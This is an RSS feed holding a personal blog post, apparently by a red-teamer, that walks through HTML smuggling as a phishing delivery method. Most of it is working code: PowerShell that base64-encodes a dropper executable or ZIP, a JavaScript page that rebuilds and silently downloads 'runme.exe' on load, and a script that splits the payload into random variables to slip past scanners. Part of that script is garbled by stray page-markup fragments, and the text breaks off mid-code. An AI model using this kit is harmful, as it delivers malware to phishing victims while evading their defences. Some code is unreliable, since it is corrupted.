<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>Matthew Grant&#39;s Blog</title>
    <link>https://ma.tthewgrant.com/</link>
    <description>Recent content on Matthew Grant&#39;s Blog</description>
    <generator>Hugo -- gohugo.io</generator>
    <language>en-us</language>
    <lastBuildDate>Fri, 24 Feb 2023 00:00:00 +0000</lastBuildDate><atom:link href="https://ma.tthewgrant.com/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>HTML Smuggling</title>
      <link>https://ma.tthewgrant.com/posts/htmlsmuggling/</link>
      <pubDate>Fri, 24 Feb 2023 00:00:00 +0000</pubDate>
      
      <guid>https://ma.tthewgrant.com/posts/htmlsmuggling/</guid>
      <description>Intro to HTML Smuggling HTML smuggling, or T1027.006, is technically a defense evasion technique, although it is heavily used in conjuction with phishing initial access techniques such as T1566.001 and 1566.002. HTML smuggling through both have been seen in the wild, including delivering QakBot through URL and attachments used by NOBELIUM. The smuggling part behind HTML smugging is referring to the fact that the payload is assembled on the client side rather than directly requested.</description>
      <content>&lt;h1 id=&#34;intro-to-html-smuggling&#34;&gt;Intro to HTML Smuggling&lt;/h1&gt;
&lt;p&gt;HTML smuggling, or &lt;a href=&#34;https://attack.mitre.org/techniques/T1027/006/&#34;&gt;T1027.006&lt;/a&gt;, is technically a defense evasion technique, although it is heavily used in conjuction with phishing initial access techniques such as &lt;a href=&#34;https://attack.mitre.org/techniques/T1566/001/&#34;&gt;T1566.001&lt;/a&gt; and &lt;a href=&#34;https://attack.mitre.org/techniques/T1566/002/&#34;&gt;1566.002&lt;/a&gt;. HTML smuggling through both have been seen in the wild, including &lt;a href=&#34;https://www.cyfirma.com/outofband/html-smuggling-a-stealthier-approach-to-deliver-malware/&#34;&gt;delivering QakBot through URL&lt;/a&gt; and &lt;a href=&#34;https://www.microsoft.com/en-us/security/blog/2021/11/11/html-smuggling-surges-highly-evasive-loader-technique-increasingly-used-in-banking-malware-targeted-attacks/&#34;&gt;attachments used by NOBELIUM&lt;/a&gt;. &lt;br&gt;
The smuggling part behind HTML smugging is referring to the fact that the payload is assembled on the client side rather than directly requested. The hope is that since it isn&amp;rsquo;t retrieving a remote resource then it&amp;rsquo;ll avoid passing the actual payload through the perimeter security, instead creating the decoded Javascript blob on the client side and downloading that.&lt;/p&gt;
&lt;h1 id=&#34;implementation&#34;&gt;Implementation&lt;/h1&gt;
&lt;h4 id=&#34;framework&#34;&gt;Framework&lt;/h4&gt;
&lt;p&gt;For building the base64 encoded payload on Windows, &lt;a href=&#34;https://stackoverflow.com/questions/42592518/encode-decode-exe-into-base64&#34;&gt;Powershell&lt;/a&gt; can be used fairly easily to base64 encode executables and zip files. From there, you can use that base64 encoded content in the HTML smuggling payload. &lt;br&gt;
I used the Powershell below to start for creating the base64 encoded content.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-powershell&#34; data-lang=&#34;powershell&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$b64 = [&lt;span style=&#34;color:#66d9ef&#34;&gt;Convert&lt;/span&gt;]::ToBase64String([&lt;span style=&#34;color:#66d9ef&#34;&gt;IO.File&lt;/span&gt;]::ReadAllBytes(&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;Documents\dropper\dropper.exe&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$b64 | Out-File &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;.\Documents\html smuggling\payload.txt&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;For the base content, I&amp;rsquo;ve followed &lt;a href=&#34;https://outflank.nl/blog/2018/08/14/html-smuggling-explained/&#34;&gt;Outflank&amp;rsquo;s&lt;/a&gt; article fairly heavily for the actual html page. &lt;code&gt;&amp;lt;encoded file&amp;gt;&lt;/code&gt; should be replaced with the base64 encoded content generated from the Powershell above, and I&amp;rsquo;ve used a method &lt;a href=&#34;https://stackoverflow.com/questions/16245767/creating-a-blob-from-a-base64-string-in-javascript&#34;&gt;separate&lt;/a&gt; from the blog post for decoding the base64 content in Javascript. &lt;br&gt;
The rough structure that I&amp;rsquo;m using to trial it out and build off of is below.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-html&#34; data-lang=&#34;html&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&amp;lt;&lt;span style=&#34;color:#f92672&#34;&gt;body&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &amp;lt;&lt;span style=&#34;color:#f92672&#34;&gt;script&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#66d9ef&#34;&gt;var&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;file&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;&amp;lt;&lt;/span&gt;&lt;span style=&#34;color:#a6e22e&#34;&gt;encoded&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;file&lt;/span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;&amp;gt;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#66d9ef&#34;&gt;var&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;characters&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;atob&lt;/span&gt;(&lt;span style=&#34;color:#a6e22e&#34;&gt;file&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#66d9ef&#34;&gt;var&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;numbers&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#66d9ef&#34;&gt;new&lt;/span&gt; Array(&lt;span style=&#34;color:#a6e22e&#34;&gt;characters&lt;/span&gt;.&lt;span style=&#34;color:#a6e22e&#34;&gt;length&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#66d9ef&#34;&gt;for&lt;/span&gt; (&lt;span style=&#34;color:#66d9ef&#34;&gt;let&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;i&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;; &lt;span style=&#34;color:#a6e22e&#34;&gt;i&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;&amp;lt;&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;characters&lt;/span&gt;.&lt;span style=&#34;color:#a6e22e&#34;&gt;length&lt;/span&gt;; &lt;span style=&#34;color:#a6e22e&#34;&gt;i&lt;/span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;++&lt;/span&gt;){
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#a6e22e&#34;&gt;numbers&lt;/span&gt;[&lt;span style=&#34;color:#a6e22e&#34;&gt;i&lt;/span&gt;] &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;characters&lt;/span&gt;.&lt;span style=&#34;color:#a6e22e&#34;&gt;charCodeAt&lt;/span&gt;(&lt;span style=&#34;color:#a6e22e&#34;&gt;i&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        }
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#66d9ef&#34;&gt;var&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;decodedArray&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#66d9ef&#34;&gt;new&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;Uint8Array&lt;/span&gt;(&lt;span style=&#34;color:#a6e22e&#34;&gt;numbers&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#66d9ef&#34;&gt;var&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;blob&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#66d9ef&#34;&gt;new&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;Blob&lt;/span&gt;([&lt;span style=&#34;color:#a6e22e&#34;&gt;decodedArray&lt;/span&gt;], {&lt;span style=&#34;color:#a6e22e&#34;&gt;type&lt;/span&gt;&lt;span style=&#34;color:#f92672&#34;&gt;:&lt;/span&gt; &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;octet/stream&amp;#39;&lt;/span&gt;});
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#66d9ef&#34;&gt;var&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;filename&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;runme.exe&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#66d9ef&#34;&gt;if&lt;/span&gt;(window.&lt;span style=&#34;color:#a6e22e&#34;&gt;navigator&lt;/span&gt;.&lt;span style=&#34;color:#a6e22e&#34;&gt;msSaveOrOpenBlob&lt;/span&gt;) window.&lt;span style=&#34;color:#a6e22e&#34;&gt;navigator&lt;/span&gt;.&lt;span style=&#34;color:#a6e22e&#34;&gt;msSaveBlob&lt;/span&gt;(&lt;span style=&#34;color:#a6e22e&#34;&gt;blob&lt;/span&gt;, &lt;span style=&#34;color:#a6e22e&#34;&gt;filename&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#66d9ef&#34;&gt;else&lt;/span&gt;{
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#66d9ef&#34;&gt;var&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;a&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; document.&lt;span style=&#34;color:#a6e22e&#34;&gt;createElement&lt;/span&gt;(&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;a&amp;#39;&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            document.&lt;span style=&#34;color:#a6e22e&#34;&gt;body&lt;/span&gt;.&lt;span style=&#34;color:#a6e22e&#34;&gt;appendChild&lt;/span&gt;(&lt;span style=&#34;color:#a6e22e&#34;&gt;a&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#a6e22e&#34;&gt;a&lt;/span&gt;.&lt;span style=&#34;color:#a6e22e&#34;&gt;style&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;display: none&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#66d9ef&#34;&gt;var&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;url&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; window.&lt;span style=&#34;color:#a6e22e&#34;&gt;URL&lt;/span&gt;.&lt;span style=&#34;color:#a6e22e&#34;&gt;createObjectURL&lt;/span&gt;(&lt;span style=&#34;color:#a6e22e&#34;&gt;blob&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#a6e22e&#34;&gt;a&lt;/span&gt;.&lt;span style=&#34;color:#a6e22e&#34;&gt;href&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;url&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#a6e22e&#34;&gt;a&lt;/span&gt;.&lt;span style=&#34;color:#a6e22e&#34;&gt;download&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;filename&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            &lt;span style=&#34;color:#a6e22e&#34;&gt;a&lt;/span&gt;.&lt;span style=&#34;color:#a6e22e&#34;&gt;click&lt;/span&gt;();
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;            window.&lt;span style=&#34;color:#a6e22e&#34;&gt;URL&lt;/span&gt;.&lt;span style=&#34;color:#a6e22e&#34;&gt;revokeObjectURL&lt;/span&gt;(&lt;span style=&#34;color:#a6e22e&#34;&gt;url&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        }
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &amp;lt;/&lt;span style=&#34;color:#f92672&#34;&gt;script&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &amp;lt;&lt;span style=&#34;color:#f92672&#34;&gt;h1&lt;/span&gt;&amp;gt;hello&amp;lt;/&lt;span style=&#34;color:#f92672&#34;&gt;h1&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&amp;lt;/&lt;span style=&#34;color:#f92672&#34;&gt;body&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The page above will download and save a PE file as that&amp;rsquo;s what I&amp;rsquo;ve output it as. As well, trying to run it, Safe Run obviously catches it immediately, but it looks like it&amp;rsquo;s been successfully smuggled and built client-side. &lt;br&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020230121190503.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;



  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020230121190524.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;

&lt;/p&gt;
&lt;p&gt;For the actual executable, I was just testing it with &lt;a href=&#34;https://github.com/Ma-Cr/offensive-go/blob/main/01-loader.go&#34;&gt;a Golang loader&lt;/a&gt; that I&amp;rsquo;ve previously put together. &lt;br&gt;
An example of what this looks like all put together is in a screenshot below.&lt;/p&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020230121190838.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;


&lt;p&gt;From here, I was thinking that I&amp;rsquo;d focus on improving the page&amp;rsquo;s believability, but I was interested in how people were doing evasion or obsfucation specifically within HTML smuggling so that&amp;rsquo;s what I moved onto next.&lt;/p&gt;
&lt;h4 id=&#34;obsfucation&#34;&gt;Obsfucation&lt;/h4&gt;
&lt;p&gt;For obsfucation and evasion, the right way to go looks like further encryption such as the RC4 encryption used in &lt;a href=&#34;https://github.com/mdsecactivebreach/SharpShooter&#34;&gt;MDSec&amp;rsquo;s SharpShooter&lt;/a&gt;. &lt;br&gt;
To play with it a little further without diving into payload encryption, I thought I&amp;rsquo;d just build a small script for building the base64 payload with string concatenation. Below is the PowerShell that I put together to do so, it takes the content from &lt;code&gt;Documents\dropper\document.zip&lt;/code&gt; in this case, base64 encodes it, splits it into eight separate strings and creates variables for each. The resulting Javascript is then output to &lt;code&gt;Documents\html smuggling\payload.txt&lt;/code&gt; in this case.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-powershell&#34; data-lang=&#34;powershell&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$b64 = [&lt;span style=&#34;color:#66d9ef&#34;&gt;Convert&lt;/span&gt;]::ToBase64String([&lt;span style=&#34;color:#66d9ef&#34;&gt;IO.File&lt;/span&gt;]::ReadAllBytes(&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;Documents\dropper\document.zip&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$threshold = [&lt;span style=&#34;color:#66d9ef&#34;&gt;Math&lt;/span&gt;]::Round(($b64 | Measure-Object -Character).Characters / &lt;span style=&#34;color:#ae81ff&#34;&gt;8&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$div = [System.Collections.Generic.List[System.Object&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34; position=&amp;#34;&lt;/span&gt;center&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34; style=&amp;#34;&lt;/span&gt;border-radius&lt;span style=&#34;color:#960050;background-color:#1e0010&#34;&gt;:&lt;/span&gt; 8px;&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34; &amp;gt;}}(&lt;/span&gt;$b64&lt;span style=&#34;color:#e6db74&#34;&gt; -split &amp;#34;&lt;/span&gt;(.{$threshold})&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34; -ne &amp;#39;&amp;#39;)
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#e6db74&#34;&gt;&lt;/span&gt;$indexDiv&lt;span style=&#34;color:#e6db74&#34;&gt; = [System.Collections.Generic.List[System.Object&amp;#34;&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;position&lt;/span&gt;=&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;center&amp;#34;&lt;/span&gt; style=&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;border-radius: 8px;&amp;#34;&lt;/span&gt; &amp;gt;}}($b64 -split &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;(.{&lt;/span&gt;$threshold&lt;span style=&#34;color:#e6db74&#34;&gt;})&amp;#34;&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;-ne&lt;/span&gt; &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$count = ($div | Measure).Count
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;&amp;#34;&lt;/span&gt; | Out-File &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;.\Documents\html smuggling\payload.txt&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$builderDict = @{}
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#66d9ef&#34;&gt;Do&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;	$content = Get-Random -InputObject $div
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;	$index = $div.IndexOf($content)
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    $builderIndex = $indexDiv.IndexOf($content)
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;	$line = &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;a&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;	$random = Get-Random -Max &lt;span style=&#34;color:#ae81ff&#34;&gt;1111&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;	$line += $random
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;	$line += &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39; = &amp;#34;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;	$line += $content
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;	$line += &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;&amp;#34;;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;	$line | Out-File -Append &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;.\Documents\html smuggling\payload.txt&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;	$div.RemoveAt($index)
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;	$count -= &lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;	$varName = &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;a&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;	$varName += $random
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    $builderDict.Add($builderIndex, $varName)
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;} &lt;span style=&#34;color:#66d9ef&#34;&gt;Until&lt;/span&gt; ($count &lt;span style=&#34;color:#f92672&#34;&gt;-eq&lt;/span&gt; &lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$builder = &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;var file = &amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#66d9ef&#34;&gt;for&lt;/span&gt;($i = &lt;span style=&#34;color:#ae81ff&#34;&gt;0&lt;/span&gt;; $i &lt;span style=&#34;color:#f92672&#34;&gt;-lt&lt;/span&gt; $builderDict.count; $i++){
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    $builder += $builderDict[$i]
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &lt;span style=&#34;color:#66d9ef&#34;&gt;if&lt;/span&gt;($i &lt;span style=&#34;color:#f92672&#34;&gt;-eq&lt;/span&gt; $builderDict.count - &lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt;){
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        $builder += &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34;;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    } &lt;span style=&#34;color:#66d9ef&#34;&gt;else&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        $builder += &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#34; + &amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    }
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$builder | Out-File -Append &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;.\Documents\html smuggling\payload.txt&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;It works well with building the base64 content and delivering the ZIP as can be seen from the screenshot below. &lt;br&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020230122185344.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;

&lt;/p&gt;
&lt;p&gt;The actual variables and concatenation in the page can be seen below as well. &lt;br&gt;

  &lt;img src=&#34;https://ma.tthewgrant.com/img/Pasted%20image%2020230122190948.png&#34;  class=&#34;center&#34;  style=&#34;border-radius: 8px;&#34;  /&gt;

&lt;/p&gt;
&lt;p&gt;The full file for HTML smuggling with the content generated from the PowerShell then looks something like below.&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-html&#34; data-lang=&#34;html&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&amp;lt;&lt;span style=&#34;color:#f92672&#34;&gt;body&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;    &amp;lt;&lt;span style=&#34;color:#f92672&#34;&gt;script&lt;/span&gt;&amp;gt;   
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        {&lt;span style=&#34;color:#a6e22e&#34;&gt;b64&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;variables&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#66d9ef&#34;&gt;var&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;file&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;=&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;a206&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;+&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;a1041&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;+&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;a447&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;+&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;a364&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;+&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;a1015&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;+&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;a1108&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;+&lt;/span&gt; &lt;span style=&#34;color:#a6e22e&#34;&gt;a289&lt;/span&gt; &lt;span style=&#34;color:#f92672&#34;&gt;+&lt;/span&gt; &lt;span 